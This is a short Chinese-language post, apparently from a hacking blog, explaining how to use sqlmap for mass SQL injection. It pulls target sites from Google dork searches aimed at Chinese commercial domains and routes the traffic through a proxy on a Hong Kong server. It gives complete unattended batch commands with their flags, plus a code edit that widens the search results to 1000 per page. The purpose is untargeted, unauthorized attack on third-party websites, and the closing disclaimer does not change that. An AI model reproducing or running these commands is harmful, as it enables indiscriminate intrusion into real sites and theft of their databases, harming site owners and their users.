说到批量渗透注入肯定大家都是非常感兴趣的,对比了很多工具个人感觉都没有sqlmap用得顺手
本次渗透只需要两个东西
1.一台香港的服务器
2.sqlmap
因为sqlmap自带谷歌语法搜索引擎这里就比较香香,只需要配置一下sqlmap,睡一觉就好了,坐等结果
长护短说介绍一下如何使用sqlmap进行批量渗透
sqlmap -g "inurl:php?id=10 site:.com.cn" --proxy "http://127.0.0.1:1080" --threads 5 --batch --answer "extending=N,follow=N,keep=N,exploit=n" --smart
-g #谷歌搜索
–proxy #代理 (挂了ss就直接代理本地)
–threads #线程
–batch #自动回复
–answer “extending=N,follow=N,keep=N,exploit=n” #这个可以对一些特定的问题作出回答,在自动化注入中用
–smart #当有大量目标时,这个就只检查基于错误的注入点
sqlmap 默认测试谷歌前100页,增加页面修改 sqlmap\lib\utils\search.py 中的第63行代码
url = “https://www.google.com/search?”url += “q=%s&” % urlencode(dork, convall=True)url += “num=100&hl=en&complete=0&safe=off&filter=0&btnG=Search”url += “&start=%d” % ((gpage – 1) * 100)
注释:
q:搜索关键词num:搜索页面,默认为10,貌似最大是100,改为1000试试看hl:默认问英文en,改为中文则是zh-CN,排除国外的网站complete:全部结果
safe:是否开启安全过滤filter:是否过滤重复结果btnG:正常搜索提交start:开始页面
修改 num 值为 1000
我个人比较喜欢这样搞嘻嘻
python sqlmap.py -g ”inurl:index.php?id=1“ --threads 5 --batch --answer "extending=N,follow=N,keep=N,exploit=n" --level 5
再次声明,只是技术分享,用于违法与作者无关